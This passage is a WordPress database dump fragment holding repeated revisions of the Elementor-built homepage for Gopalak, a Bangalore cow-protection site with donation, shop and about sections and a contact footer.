svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:07:09','2022-10-20 12:37:09','',1373,'https://gopalak.in/?p=1967',0,'revision','',0),(1968,1,'2022-10-20 18:07:09','2022-10-20 12:37:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:07:09','2022-10-20 12:37:09','',1373,'https://gopalak.in/?p=1968',0,'revision','',0),(1969,1,'2022-10-20 18:07:10','2022-10-20 12:37:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img 